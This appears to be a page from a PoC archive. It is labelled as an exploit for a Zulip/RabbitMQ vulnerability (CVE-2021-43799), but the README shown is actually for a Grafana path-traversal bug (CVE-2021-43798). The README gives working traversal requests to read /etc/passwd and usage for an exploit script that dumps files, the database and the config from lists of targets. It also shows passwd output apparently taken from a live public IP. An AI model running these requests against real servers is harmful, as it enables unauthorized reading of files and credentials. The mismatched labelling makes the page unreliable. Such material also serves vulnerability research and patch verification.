Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-43799 PoC — RabbitMQ exposes ports with weak default secrets in Zulip Server

Source
https://github.com/scopion/CVE-2021-43799
Associated Vulnerability
Title:RabbitMQ exposes ports with weak default secrets in Zulip Server (CVE-2021-43799)
Description:Zulip is an open-source team collaboration tool. Zulip Server installs RabbitMQ for internal message passing. In versions of Zulip Server prior to 4.9, the initial installation (until first reboot, or restart of RabbitMQ) does not successfully limit the default ports which RabbitMQ opens; this includes port 25672, the RabbitMQ distribution port, which is used as a management port. RabbitMQ's default "cookie" which protects this port is generated using a weak PRNG, which limits the entropy of the password to at most 36 bits; in practicality, the seed for the randomizer is biased, resulting in approximately 20 bits of entropy. If other firewalls (at the OS or network level) do not protect port 25672, a remote attacker can brute-force the 20 bits of entropy in the "cookie" and leverage it for arbitrary execution of code as the rabbitmq user. They can also read all data which is sent through RabbitMQ, which includes all message traffic sent by users. Version 4.9 contains a patch for this vulnerability. As a workaround, ensure that firewalls prevent access to ports 5672 and 25672 from outside the Zulip server.
Description
Python Exploit Code
Readme
# CVE-2021-43798
Grafana 8.x Path Traversal (Pre-Auth)
All credits go to j0v and his tweet https://twitter.com/j0v0x0/status/1466845212626542607
## Disclaimer
This is for educational purposes only. I am not responsible for your actions. Use at your own discretion.
In good faith, I've held back releasing this PoC until either this vulnerability is public or a patch is available.
## Table of Content
* [Explanation](#Explanation) - Explaining the vulnerability
* [Attack Vectors](#Attack-Vectors) - List of attacks you can carry out
* [Exploit Script](#Exploit-Script) - Exploit script usage
## Explanation
I noticed a [tweet by j0v](https://twitter.com/j0v0x0/status/1466845212626542607) claiming to have found a Grafana path
traversal bug. Out of curiosity, I started looking at the Grafana source code. In the tweet, it was mentioned it was a
pre-auth bug. There are only a couple of public API endpoints in Grafana, and only one of those took a file path from
the user.
Grafana has a public API endpoint, `/public/plugins/:pluginId`, which allows you to view a plugin's assets. This works
by providing a valid `:pluginId` and then specifying the file path, such as `img/logo.png`. However, Grafana fails to
sanitize the user provided file path, leading to path traversal.
The directory being accessed is at `<grafana>/public/app/plugins/panel/<pluginId>`. On a standard Grafana installation,
the Grafana data directory is `/usr/share/grafana`. So by going back 8 directories, you can reach the filesystem root
directory.
HTTP Request:
```
GET -  http://localhost:3000/public/plugins/alertlist/../../../../../../../../etc/passwd
```
Offending Code: https://github.com/grafana/grafana/blob/c80e7764d84d531fa56dca14d5b96cf0e7099c47/pkg/api/plugins.go#L284
**Note: This does not work in the browser (which automatically collapse the `../` in the path)**
It can be tested with curl by using the `--path-as-is` argument:
```
curl --path-as-is http://localhost:3000/public/plugins/alertlist/../../../../../../../../etc/passwd
```
## Help:


```
usage: exploit2.py [-h] [-l INPUT_LIST] [-db] [-cfg] [-c] [-t TARGET] [-f TARGET_FILE] [-w WRITE_FILE] [-v]

optional arguments:
  -h, --help            show this help message and exit
  -l INPUT_LIST, --list INPUT_LIST
                        Input list of ip:port
  -db, --database       Dump db
  -cfg, --config        Dump config
  -c, --check           Enable output regex checking (Suppress false positives)
  -t TARGET, --target TARGET
                        Single target
  -f TARGET_FILE, --file TARGET_FILE
                        Remote target file
  -w WRITE_FILE, --write WRITE_FILE
                        Directory to write files to.
  -v, --verbosity       Verbosity

```


## Get a file:

```
./exploit.py -f /etc/passwd -l targets.list
```

## Dump db:
```
./exploit.py -f /etc/passwd -l targets.list -db
```

Dump Config:
```
./exploit.py -f /etc/passwd -l targets.list -cfg
```


## Other Options:

Only print valid files:

```
python3 exploit2.py -t http://50.17.123.83:3000 -c
URL: passwd
PATH: /public/plugins/alertlist/../../../../../../../..//etc/passwd
http://50.17.123.83:3000/public/plugins/alertlist/../../../../../../../..//etc/passwd
Status: 200
Content-type:text/plain; charset=utf-8
SUCCESS: http://50.17.123.83:3000
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
landscape:x:110:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
ec2-instance-connect:x:112:65534::/nonexistent:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
node-exp:x:997:100::/:/usr/sbin/nologin
prometheus:x:996:997::/var/lib/prometheus:/usr/sbin/nologin
alertmanager:x:995:996::/home/alertmanager:/usr/sbin/nologin
grafana:x:113:119::/usr/share/grafana:/bin/false
am-bot:x:994:995::/opt/alertmanager_bot:/usr/sbin/nologin
blackbox-exp:x:993:994::/home/blackbox-exp:/usr/sbin/nologin
pushgateway:x:992:100::/:/usr/sbin/nologin
```

Write the file to files directory:

```
python3 exploit2.py -t http://50.17.123.83:3000 -c -w files
```
File Snapshot

 [4.0K]  /data/pocs/cb4f443088002da5cc660522f7110242368d1c94
├── [6.1K]  exploit.py
└── [5.5K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →